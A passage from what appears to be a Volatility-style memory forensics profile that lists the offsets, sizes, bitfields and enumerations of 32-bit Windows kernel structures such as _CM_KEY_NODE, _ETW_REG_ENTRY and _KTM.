'MissedEtwRegistration' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_219e' : [ 0x4, {
'Flags' : [ 0x0, ['__unnamed_219c']],
'Whole' : [ 0x0, ['unsigned long']],
} ],
'_VF_TARGET_VERIFIED_DRIVER_DATA' : [ 0x90, {
'SuspectDriverEntry' : [ 0x0, ['pointer', ['_VF_SUSPECT_DRIVER_ENTRY']]],
'WMICallback' : [ 0x4, ['pointer', ['void']]],
'EtwHandlesListHead' : [ 0x8, ['_LIST_ENTRY']],
'u1' : [ 0x10, ['__unnamed_219e']],
'Signature' : [ 0x14, ['unsigned long']],
'PoolPageHeaders' : [ 0x18, ['_SLIST_HEADER']],
'PoolTrackers' : [ 0x20, ['_SLIST_HEADER']],
'CurrentPagedPoolAllocations' : [ 0x28, ['unsigned long']],
'CurrentNonPagedPoolAllocations' : [ 0x2c, ['unsigned long']],
'PeakPagedPoolAllocations' : [ 0x30, ['unsigned long']],
'PeakNonPagedPoolAllocations' : [ 0x34, ['unsigned long']],
'PagedBytes' : [ 0x38, ['unsigned long']],
'NonPagedBytes' : [ 0x3c, ['unsigned long']],
'PeakPagedBytes' : [ 0x40, ['unsigned long']],
'PeakNonPagedBytes' : [ 0x44, ['unsigned long']],
'RaiseIrqls' : [ 0x48, ['unsigned long']],
'AcquireSpinLocks' : [ 0x4c, ['unsigned long']],
'SynchronizeExecutions' : [ 0x50, ['unsigned long']],
'AllocationsWithNoTag' : [ 0x54, ['unsigned long']],
'AllocationsFailed' : [ 0x58, ['unsigned long']],
'AllocationsFailedDeliberately' : [ 0x5c, ['unsigned long']],
'LockedBytes' : [ 0x60, ['unsigned long']],
'PeakLockedBytes' : [ 0x64, ['unsigned long']],
'MappedLockedBytes' : [ 0x68, ['unsigned long']],
'PeakMappedLockedBytes' : [ 0x6c, ['unsigned long']],
'MappedIoSpaceBytes' : [ 0x70, ['unsigned long']],
'PeakMappedIoSpaceBytes' : [ 0x74, ['unsigned long']],
'PagesForMdlBytes' : [ 0x78, ['unsigned long']],
'PeakPagesForMdlBytes' : [ 0x7c, ['unsigned long']],
'ContiguousMemoryBytes' : [ 0x80, ['unsigned long']],
'PeakContiguousMemoryBytes' : [ 0x84, ['unsigned long']],
'ContiguousMemoryListHead' : [ 0x88, ['_LIST_ENTRY']],
} ],
'_PCAT_FIRMWARE_INFORMATION' : [ 0x4, {
'PlaceHolder' : [ 0x0, ['unsigned long']],
} ],
'_PRIVATE_CACHE_MAP' : [ 0x58, {
'NodeTypeCode' : [ 0x0, ['short']],
'Flags' : [ 0x0, ['_PRIVATE_CACHE_MAP_FLAGS']],
'UlongFlags' : [ 0x0, ['unsigned long']],
'ReadAheadMask' : [ 0x4, ['unsigned long']],
'FileObject' : [ 0x8, ['pointer', ['_FILE_OBJECT']]],
'FileOffset1' : [ 0x10, ['_LARGE_INTEGER']],
'BeyondLastByte1' : [ 0x18, ['_LARGE_INTEGER']],
'FileOffset2' : [ 0x20, ['_LARGE_INTEGER']],
'BeyondLastByte2' : [ 0x28, ['_LARGE_INTEGER']],
'SequentialReadCount' : [ 0x30, ['unsigned long']],
'ReadAheadLength' : [ 0x34, ['unsigned long']],
'ReadAheadOffset' : [ 0x38, ['_LARGE_INTEGER']],
'ReadAheadBeyondLastByte' : [ 0x40, ['_LARGE_INTEGER']],
'ReadAheadSpinLock' : [ 0x48, ['unsigned long']],
'PrivateLinks' : [ 0x4c, ['_LIST_ENTRY']],
'ReadAheadWorkItem' : [ 0x54, ['pointer', ['void']]],
} ],
'_CM_KEY_NODE' : [ 0x50, {
'Signature' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned short']],
'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']],
'Spare' : [ 0xc, ['unsigned long']],
'Parent' : [ 0x10, ['unsigned long']],
'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]],
'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]],
'ValueList' : [ 0x24, ['_CHILD_LIST']],
'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']],
'Security' : [ 0x2c, ['unsigned long']],
'Class' : [ 0x30, ['unsigned long']],
'MaxNameLen' : [ 0x34, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'UserFlags' : [ 0x34, ['BitField', dict(start_bit = 16, end_bit = 20, native_type='unsigned long')]],
'VirtControlFlags' : [ 0x34, ['BitField', dict(start_bit = 20, end_bit = 24, native_type='unsigned long')]],
'Debug' : [ 0x34, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
'MaxClassLen' : [ 0x38, ['unsigned long']],
'MaxValueNameLen' : [ 0x3c, ['unsigned long']],
'MaxValueDataLen' : [ 0x40, ['unsigned long']],
'WorkVar' : [ 0x44, ['unsigned long']],
'NameLength' : [ 0x48, ['unsigned short']],
'ClassLength' : [ 0x4a, ['unsigned short']],
'Name' : [ 0x4c, ['array', 1, ['wchar']]],
} ],
'_TPM_BOOT_ENTROPY_LDR_RESULT' : [ 0x48, {
'Policy' : [ 0x0, ['unsigned long long']],
'ResultCode' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'TpmBootEntropyStructureUninitialized', 1: 'TpmBootEntropyDisabledByPolicy', 2: 'TpmBootEntropyNoTpmFound', 3: 'TpmBootEntropyTpmError', 4: 'TpmBootEntropySuccess'})]],
'ResultStatus' : [ 0xc, ['long']],
'Time' : [ 0x10, ['unsigned long long']],
'EntropyLength' : [ 0x18, ['unsigned long']],
'EntropyData' : [ 0x1c, ['array', 40, ['unsigned char']]],
} ],
'_RTL_HANDLE_TABLE' : [ 0x20, {
'MaximumNumberOfHandles' : [ 0x0, ['unsigned long']],
'SizeOfHandleTableEntry' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['array', 2, ['unsigned long']]],
'FreeHandles' : [ 0x10, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
'CommittedHandles' : [ 0x14, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
'UnCommittedHandles' : [ 0x18, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
'MaxReservedHandles' : [ 0x1c, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
} ],
'_PTE_TRACKER' : [ 0x30, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Mdl' : [ 0x8, ['pointer', ['_MDL']]],
'Count' : [ 0xc, ['unsigned long']],
'SystemVa' : [ 0x10, ['pointer', ['void']]],
'StartVa' : [ 0x14, ['pointer', ['void']]],
'Offset' : [ 0x18, ['unsigned long']],
'Length' : [ 0x1c, ['unsigned long']],
'Page' : [ 0x20, ['unsigned long']],
'IoMapping' : [ 0x24, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Matched' : [ 0x24, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'CacheAttribute' : [ 0x24, ['BitField', dict(start_bit = 2, end_bit = 4, native_type='unsigned long')]],
'Spare' : [ 0x24, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
'CallingAddress' : [ 0x28, ['pointer', ['void']]],
'CallersCaller' : [ 0x2c, ['pointer', ['void']]],
} ],
'_KTHREAD_COUNTERS' : [ 0x1a8, {
'WaitReasonBitMap' : [ 0x0, ['unsigned long long']],
'UserData' : [ 0x8, ['pointer', ['_THREAD_PERFORMANCE_DATA']]],
'Flags' : [ 0xc, ['unsigned long']],
'ContextSwitches' : [ 0x10, ['unsigned long']],
'CycleTimeBias' : [ 0x18, ['unsigned long long']],
'HardwareCounters' : [ 0x20, ['unsigned long long']],
'HwCounter' : [ 0x28, ['array', 16, ['_COUNTER_READING']]],
} ],
'_SHARED_CACHE_MAP_LIST_CURSOR' : [ 0xc, {
'SharedCacheMapLinks' : [ 0x0, ['_LIST_ENTRY']],
'Flags' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_GET_VERSION64' : [ 0x28, {
'MajorVersion' : [ 0x0, ['unsigned short']],
'MinorVersion' : [ 0x2, ['unsigned short']],
'ProtocolVersion' : [ 0x4, ['unsigned char']],
'KdSecondaryVersion' : [ 0x5, ['unsigned char']],
'Flags' : [ 0x6, ['unsigned short']],
'MachineType' : [ 0x8, ['unsigned short']],
'MaxPacketType' : [ 0xa, ['unsigned char']],
'MaxStateChange' : [ 0xb, ['unsigned char']],
'MaxManipulate' : [ 0xc, ['unsigned char']],
'Simulation' : [ 0xd, ['unsigned char']],
'Unused' : [ 0xe, ['array', 1, ['unsigned short']]],
'KernBase' : [ 0x10, ['unsigned long long']],
'PsLoadedModuleList' : [ 0x18, ['unsigned long long']],
'DebuggerDataList' : [ 0x20, ['unsigned long long']],
} ],
'_HMAP_ENTRY' : [ 0x10, {
'BlockAddress' : [ 0x0, ['unsigned long']],
'BinAddress' : [ 0x4, ['unsigned long']],
'CmView' : [ 0x8, ['pointer', ['_CM_VIEW_OF_FILE']]],
'MemAlloc' : [ 0xc, ['unsigned long']],
} ],
'_RTL_ATOM_TABLE_ENTRY' : [ 0x10, {
'HashLink' : [ 0x0, ['pointer', ['_RTL_ATOM_TABLE_ENTRY']]],
'HandleIndex' : [ 0x4, ['unsigned short']],
'Atom' : [ 0x6, ['unsigned short']],
'ReferenceCount' : [ 0x8, ['unsigned short']],
'Flags' : [ 0xa, ['unsigned char']],
'NameLength' : [ 0xb, ['unsigned char']],
'Name' : [ 0xc, ['array', 1, ['wchar']]],
} ],
'_TXN_PARAMETER_BLOCK' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'TxFsContext' : [ 0x2, ['unsigned short']],
'TransactionObject' : [ 0x4, ['pointer', ['void']]],
} ],
'_LOADER_PERFORMANCE_DATA' : [ 0x10, {
'StartTime' : [ 0x0, ['unsigned long long']],
'EndTime' : [ 0x8, ['unsigned long long']],
} ],
'_PNP_DEVICE_ACTION_ENTRY' : [ 0x20, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'RequestType' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'AssignResources', 1: 'ClearDeviceProblem', 2: 'ClearProblem', 3: 'ClearEjectProblem', 4: 'HaltDevice', 5: 'QueryPowerRelations', 6: 'Rebalance', 7: 'ReenumerateBootDevices', 8: 'ReenumerateDeviceOnly', 9: 'ReenumerateDeviceTree', 10: 'ReenumerateRootDevices', 11: 'RequeryDeviceState', 12: 'ResetDevice', 13: 'ResourceRequirementsChanged', 14: 'RestartEnumeration', 15: 'SetDeviceProblem', 16: 'StartDevice', 17: 'StartSystemDevicesPass0', 18: 'StartSystemDevicesPass1'})]],
'ReorderingBarrier' : [ 0x10, ['unsigned char']],
'RequestArgument' : [ 0x14, ['unsigned long']],
'CompletionEvent' : [ 0x18, ['pointer', ['_KEVENT']]],
'CompletionStatus' : [ 0x1c, ['pointer', ['long']]],
} ],
'_COUNTER_READING' : [ 0x18, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PMCCounter', 1: 'MaxHardwareCounterType'})]],
'Index' : [ 0x4, ['unsigned long']],
'Start' : [ 0x8, ['unsigned long long']],
'Total' : [ 0x10, ['unsigned long long']],
} ],
'_MMSESSION' : [ 0x38, {
'SystemSpaceViewLock' : [ 0x0, ['_KGUARDED_MUTEX']],
'SystemSpaceViewLockPointer' : [ 0x20, ['pointer', ['_KGUARDED_MUTEX']]],
'SystemSpaceViewTable' : [ 0x24, ['pointer', ['_MMVIEW']]],
'SystemSpaceHashSize' : [ 0x28, ['unsigned long']],
'SystemSpaceHashEntries' : [ 0x2c, ['unsigned long']],
'SystemSpaceHashKey' : [ 0x30, ['unsigned long']],
'BitmapFailures' : [ 0x34, ['unsigned long']],
} ],
'_ETW_REG_ENTRY' : [ 0x2c, {
'RegList' : [ 0x0, ['_LIST_ENTRY']],
'GuidEntry' : [ 0x8, ['pointer', ['_ETW_GUID_ENTRY']]],
'Index' : [ 0xc, ['unsigned short']],
'Flags' : [ 0xe, ['unsigned short']],
'EnableMask' : [ 0x10, ['unsigned char']],
'SessionId' : [ 0x14, ['unsigned long']],
'ReplyQueue' : [ 0x14, ['pointer', ['_ETW_REPLY_QUEUE']]],
'ReplySlot' : [ 0x14, ['array', 4, ['pointer', ['_ETW_REG_ENTRY']]]],
'Process' : [ 0x24, ['pointer', ['_EPROCESS']]],
'Callback' : [ 0x24, ['pointer', ['void']]],
'CallbackContext' : [ 0x28, ['pointer', ['void']]],
} ],
'_LPCP_PORT_OBJECT' : [ 0xa4, {
'ConnectionPort' : [ 0x0, ['pointer', ['_LPCP_PORT_OBJECT']]],
'ConnectedPort' : [ 0x4, ['pointer', ['_LPCP_PORT_OBJECT']]],
'MsgQueue' : [ 0x8, ['_LPCP_PORT_QUEUE']],
'Creator' : [ 0x18, ['_CLIENT_ID']],
'ClientSectionBase' : [ 0x20, ['pointer', ['void']]],
'ServerSectionBase' : [ 0x24, ['pointer', ['void']]],
'PortContext' : [ 0x28, ['pointer', ['void']]],
'ClientThread' : [ 0x2c, ['pointer', ['_ETHREAD']]],
'SecurityQos' : [ 0x30, ['_SECURITY_QUALITY_OF_SERVICE']],
'StaticSecurity' : [ 0x3c, ['_SECURITY_CLIENT_CONTEXT']],
'LpcReplyChainHead' : [ 0x78, ['_LIST_ENTRY']],
'LpcDataInfoChainHead' : [ 0x80, ['_LIST_ENTRY']],
'ServerProcess' : [ 0x88, ['pointer', ['_EPROCESS']]],
'MappingProcess' : [ 0x88, ['pointer', ['_EPROCESS']]],
'MaxMessageLength' : [ 0x8c, ['unsigned short']],
'MaxConnectionInfoLength' : [ 0x8e, ['unsigned short']],
'Flags' : [ 0x90, ['unsigned long']],
'WaitEvent' : [ 0x94, ['_KEVENT']],
} ],
'_ARBITER_LIST_ENTRY' : [ 0x38, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'AlternativeCount' : [ 0x8, ['unsigned long']],
'Alternatives' : [ 0xc, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'PhysicalDeviceObject' : [ 0x10, ['pointer', ['_DEVICE_OBJECT']]],
'RequestSource' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'ArbiterRequestLegacyReported', 1: 'ArbiterRequestHalReported', 2: 'ArbiterRequestLegacyAssigned', 3: 'ArbiterRequestPnpDetected', 4: 'ArbiterRequestPnpEnumerated', -1: 'ArbiterRequestUndefined'})]],
'Flags' : [ 0x18, ['unsigned long']],
'WorkSpace' : [ 0x1c, ['long']],
'InterfaceType' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'SlotNumber' : [ 0x24, ['unsigned long']],
'BusNumber' : [ 0x28, ['unsigned long']],
'Assignment' : [ 0x2c, ['pointer', ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
'SelectedAlternative' : [ 0x30, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'Result' : [ 0x34, ['Enumeration', dict(target = 'long', choices = {0: 'ArbiterResultSuccess', 1: 'ArbiterResultExternalConflict', 2: 'ArbiterResultNullRequest', -1: 'ArbiterResultUndefined'})]],
} ],
'_POP_DEVICE_SYS_STATE' : [ 0x1a8, {
'IrpMinor' : [ 0x0, ['unsigned char']],
'SystemState' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'SpinLock' : [ 0x8, ['unsigned long']],
'Thread' : [ 0xc, ['pointer', ['_KTHREAD']]],
'AbortEvent' : [ 0x10, ['pointer', ['_KEVENT']]],
'ReadySemaphore' : [ 0x14, ['pointer', ['_KSEMAPHORE']]],
'FinishedSemaphore' : [ 0x18, ['pointer', ['_KSEMAPHORE']]],
'GetNewDeviceList' : [ 0x1c, ['unsigned char']],
'Order' : [ 0x20, ['_PO_DEVICE_NOTIFY_ORDER']],
'Pending' : [ 0x190, ['_LIST_ENTRY']],
'Status' : [ 0x198, ['long']],
'FailedDevice' : [ 0x19c, ['pointer', ['_DEVICE_OBJECT']]],
'Waking' : [ 0x1a0, ['unsigned char']],
'Cancelled' : [ 0x1a1, ['unsigned char']],
'IgnoreErrors' : [ 0x1a2, ['unsigned char']],
'IgnoreNotImplemented' : [ 0x1a3, ['unsigned char']],
'TimeRefreshLockAcquired' : [ 0x1a4, ['unsigned char']],
} ],
'_SEGMENT_FLAGS' : [ 0x4, {
'TotalNumberOfPtes4132' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 10, native_type='unsigned long')]],
'ExtraSharedWowSubsections' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'LargePages' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'WatchProto' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'DebugSymbolsLoaded' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'WriteCombined' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'NoCache' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'FloppyMedia' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'DefaultProtectionMask' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 22, native_type='unsigned long')]],
'Binary32' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'ContainsDebug' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'_VF_KE_CRITICAL_REGION_TRACE' : [ 0x20, {
'Thread' : [ 0x0, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0x4, ['array', 7, ['pointer', ['void']]]],
} ],
'_DIAGNOSTIC_BUFFER' : [ 0x18, {
'Size' : [ 0x0, ['unsigned long']],
'CallerType' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'KernelRequester', 1: 'UserProcessRequester', 2: 'UserSharedServiceRequester'})]],
'ProcessImageNameOffset' : [ 0x8, ['unsigned long']],
'ProcessId' : [ 0xc, ['unsigned long']],
'ServiceTag' : [ 0x10, ['unsigned long']],
'DeviceDescriptionOffset' : [ 0x8, ['unsigned long']],
'DevicePathOffset' : [ 0xc, ['unsigned long']],
'ReasonOffset' : [ 0x14, ['unsigned long']],
} ],
'_EX_WORK_QUEUE' : [ 0x3c, {
'WorkerQueue' : [ 0x0, ['_KQUEUE']],
'DynamicThreadCount' : [ 0x28, ['unsigned long']],
'WorkItemsProcessed' : [ 0x2c, ['unsigned long']],
'WorkItemsProcessedLastPass' : [ 0x30, ['unsigned long']],
'QueueDepthLastPass' : [ 0x34, ['unsigned long']],
'Info' : [ 0x38, ['EX_QUEUE_WORKER_INFO']],
} ],
'_CLIENT_ID32' : [ 0x8, {
'UniqueProcess' : [ 0x0, ['unsigned long']],
'UniqueThread' : [ 0x4, ['unsigned long']],
} ],
'_CM_KEY_INDEX' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned short']],
'Count' : [ 0x2, ['unsigned short']],
'List' : [ 0x4, ['array', 1, ['unsigned long']]],
} ],
'_VI_DEADLOCK_THREAD' : [ 0x20, {
'Thread' : [ 0x0, ['pointer', ['_KTHREAD']]],
'CurrentSpinNode' : [ 0x4, ['pointer', ['_VI_DEADLOCK_NODE']]],
'CurrentOtherNode' : [ 0x8, ['pointer', ['_VI_DEADLOCK_NODE']]],
'ListEntry' : [ 0xc, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0xc, ['_LIST_ENTRY']],
'NodeCount' : [ 0x14, ['unsigned long']],
'PagingCount' : [ 0x18, ['unsigned long']],
'ThreadUsesEresources' : [ 0x1c, ['unsigned char']],
} ],
'_PPM_IDLE_STATE' : [ 0x40, {
'DomainMembers' : [ 0x0, ['_KAFFINITY_EX']],
'IdleCheck' : [ 0xc, ['pointer', ['void']]],
'IdleHandler' : [ 0x10, ['pointer', ['void']]],
'HvConfig' : [ 0x18, ['unsigned long long']],
'Context' : [ 0x20, ['pointer', ['void']]],
'Latency' : [ 0x24, ['unsigned long']],
'Power' : [ 0x28, ['unsigned long']],
'TimeCheck' : [ 0x2c, ['unsigned long']],
'StateFlags' : [ 0x30, ['unsigned long']],
'PromotePercent' : [ 0x34, ['unsigned char']],
'DemotePercent' : [ 0x35, ['unsigned char']],
'PromotePercentBase' : [ 0x36, ['unsigned char']],
'DemotePercentBase' : [ 0x37, ['unsigned char']],
'StateType' : [ 0x38, ['unsigned char']],
} ],
'_KRESOURCEMANAGER' : [ 0x154, {
'NotificationAvailable' : [ 0x0, ['_KEVENT']],
'cookie' : [ 0x10, ['unsigned long']],
'State' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'KResourceManagerUninitialized', 1: 'KResourceManagerOffline', 2: 'KResourceManagerOnline'})]],
'Flags' : [ 0x18, ['unsigned long']],
'Mutex' : [ 0x1c, ['_KMUTANT']],
'NamespaceLink' : [ 0x3c, ['_KTMOBJECT_NAMESPACE_LINK']],
'RmId' : [ 0x50, ['_GUID']],
'NotificationQueue' : [ 0x60, ['_KQUEUE']],
'NotificationMutex' : [ 0x88, ['_KMUTANT']],
'EnlistmentHead' : [ 0xa8, ['_LIST_ENTRY']],
'EnlistmentCount' : [ 0xb0, ['unsigned long']],
'NotificationRoutine' : [ 0xb4, ['pointer', ['void']]],
'Key' : [ 0xb8, ['pointer', ['void']]],
'ProtocolListHead' : [ 0xbc, ['_LIST_ENTRY']],
'PendingPropReqListHead' : [ 0xc4, ['_LIST_ENTRY']],
'CRMListEntry' : [ 0xcc, ['_LIST_ENTRY']],
'Tm' : [ 0xd4, ['pointer', ['_KTM']]],
'Description' : [ 0xd8, ['_UNICODE_STRING']],
'Enlistments' : [ 0xe0, ['_KTMOBJECT_NAMESPACE']],
'CompletionBinding' : [ 0x140, ['_KRESOURCEMANAGER_COMPLETION_BINDING']],
} ],
'_GDI_TEB_BATCH64' : [ 0x4e8, {
'Offset' : [ 0x0, ['unsigned long']],
'HDC' : [ 0x8, ['unsigned long long']],
'Buffer' : [ 0x10, ['array', 310, ['unsigned long']]],
} ],
'__unnamed_2215' : [ 0x4, {
'NodeSize' : [ 0x0, ['unsigned long']],
'UseLookaside' : [ 0x0, ['unsigned long']],
} ],
'_VF_AVL_TREE' : [ 0x40, {
'Lock' : [ 0x0, ['long']],
'NodeToFree' : [ 0x4, ['pointer', ['void']]],
'NodeRangeSize' : [ 0x8, ['unsigned long']],
'NodeCount' : [ 0xc, ['unsigned long']],
'Tables' : [ 0x10, ['pointer', ['_VF_AVL_TABLE']]],
'TablesNo' : [ 0x14, ['unsigned long']],
'u1' : [ 0x18, ['__unnamed_2215']],
} ],
'_FILE_NETWORK_OPEN_INFORMATION' : [ 0x38, {
'CreationTime' : [ 0x0, ['_LARGE_INTEGER']],
'LastAccessTime' : [ 0x8, ['_LARGE_INTEGER']],
'LastWriteTime' : [ 0x10, ['_LARGE_INTEGER']],
'ChangeTime' : [ 0x18, ['_LARGE_INTEGER']],
'AllocationSize' : [ 0x20, ['_LARGE_INTEGER']],
'EndOfFile' : [ 0x28, ['_LARGE_INTEGER']],
'FileAttributes' : [ 0x30, ['unsigned long']],
} ],
'_WHEA_MEMORY_ERROR_SECTION_VALIDBITS' : [ 0x8, {
'ErrorStatus' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long long')]],
'PhysicalAddress' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long long')]],
'PhysicalAddressMask' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long long')]],
'Node' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long long')]],
'Card' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long long')]],
'Module' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long long')]],
'Bank' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long long')]],
'Device' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long long')]],
'Row' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long long')]],
'Column' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long long')]],
'BitPosition' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long long')]],
'RequesterId' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long long')]],
'ResponderId' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long long')]],
'TargetId' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long long')]],
'ErrorType' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 64, native_type='unsigned long long')]],
'ValidBits' : [ 0x0, ['unsigned long long']],
} ],
'_RELATION_LIST_ENTRY' : [ 0xc, {
'Count' : [ 0x0, ['unsigned long']],
'MaxCount' : [ 0x4, ['unsigned long']],
'Devices' : [ 0x8, ['array', 1, ['pointer', ['_DEVICE_OBJECT']]]],
} ],
'_HEAP_FREE_ENTRY_EXTRA' : [ 0x4, {
'TagIndex' : [ 0x0, ['unsigned short']],
'FreeBackTraceIndex' : [ 0x2, ['unsigned short']],
} ],
'_VI_DEADLOCK_GLOBALS' : [ 0x40e0, {
'TimeAcquire' : [ 0x0, ['long long']],
'TimeRelease' : [ 0x8, ['long long']],
'ResourceDatabase' : [ 0x10, ['pointer', ['_LIST_ENTRY']]],
'ResourceDatabaseCount' : [ 0x14, ['unsigned long']],
'ResourceAddressRange' : [ 0x18, ['array', 1023, ['_VF_ADDRESS_RANGE']]],
'ThreadDatabase' : [ 0x2010, ['pointer', ['_LIST_ENTRY']]],
'ThreadDatabaseCount' : [ 0x2014, ['unsigned long']],
'ThreadAddressRange' : [ 0x2018, ['array', 1023, ['_VF_ADDRESS_RANGE']]],
'AllocationFailures' : [ 0x4010, ['unsigned long']],
'NodesTrimmedBasedOnAge' : [ 0x4014, ['unsigned long']],
'NodesTrimmedBasedOnCount' : [ 0x4018, ['unsigned long']],
'NodesSearched' : [ 0x401c, ['unsigned long']],
'MaxNodesSearched' : [ 0x4020, ['unsigned long']],
'SequenceNumber' : [ 0x4024, ['unsigned long']],
'RecursionDepthLimit' : [ 0x4028, ['unsigned long']],
'SearchedNodesLimit' : [ 0x402c, ['unsigned long']],
'DepthLimitHits' : [ 0x4030, ['unsigned long']],
'SearchLimitHits' : [ 0x4034, ['unsigned long']],
'ABC_ACB_Skipped' : [ 0x4038, ['unsigned long']],
'OutOfOrderReleases' : [ 0x403c, ['unsigned long']],
'NodesReleasedOutOfOrder' : [ 0x4040, ['unsigned long']],
'TotalReleases' : [ 0x4044, ['unsigned long']],
'RootNodesDeleted' : [ 0x4048, ['unsigned long']],
'ForgetHistoryCounter' : [ 0x404c, ['unsigned long']],
'Instigator' : [ 0x4050, ['pointer', ['void']]],
'NumberOfParticipants' : [ 0x4054, ['unsigned long']],
'Participant' : [ 0x4058, ['array', 32, ['pointer', ['_VI_DEADLOCK_NODE']]]],
'ChildrenCountWatermark' : [ 0x40d8, ['long']],
} ],
'_KTM' : [ 0x238, {
'cookie' : [ 0x0, ['unsigned long']],
'Mutex' : [ 0x4, ['_KMUTANT']],
'State' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'KKtmUninitialized', 1: 'KKtmInitialized', 2: 'KKtmRecovering', 3: 'KKtmOnline', 4: 'KKtmRecoveryFailed', 5: 'KKtmOffline'})]],
'NamespaceLink' : [ 0x28, ['_KTMOBJECT_NAMESPACE_LINK']],
'TmIdentity' : [ 0x3c, ['_GUID']],
'Flags' : [ 0x4c, ['unsigned long']],
'VolatileFlags' : [ 0x50, ['unsigned long']],
'LogFileName' : [ 0x54, ['_UNICODE_STRING']],
'LogFileObject' : [ 0x5c, ['pointer', ['_FILE_OBJECT']]],
'MarshallingContext' : [ 0x60, ['pointer', ['void']]],
'LogManagementContext' : [ 0x64, ['pointer', ['void']]],
'Transactions' : [ 0x68, ['_KTMOBJECT_NAMESPACE']],
'ResourceManagers' : [ 0xc8, ['_KTMOBJECT_NAMESPACE']],
'LsnOrderedMutex' : [ 0x128, ['_KMUTANT']],
'LsnOrderedList' : [ 0x148, ['_LIST_ENTRY']],
'CommitVirtualClock' : [ 0x150, ['_LARGE_INTEGER']],
'CommitVirtualClockMutex' : [ 0x158, ['_FAST_MUTEX']],
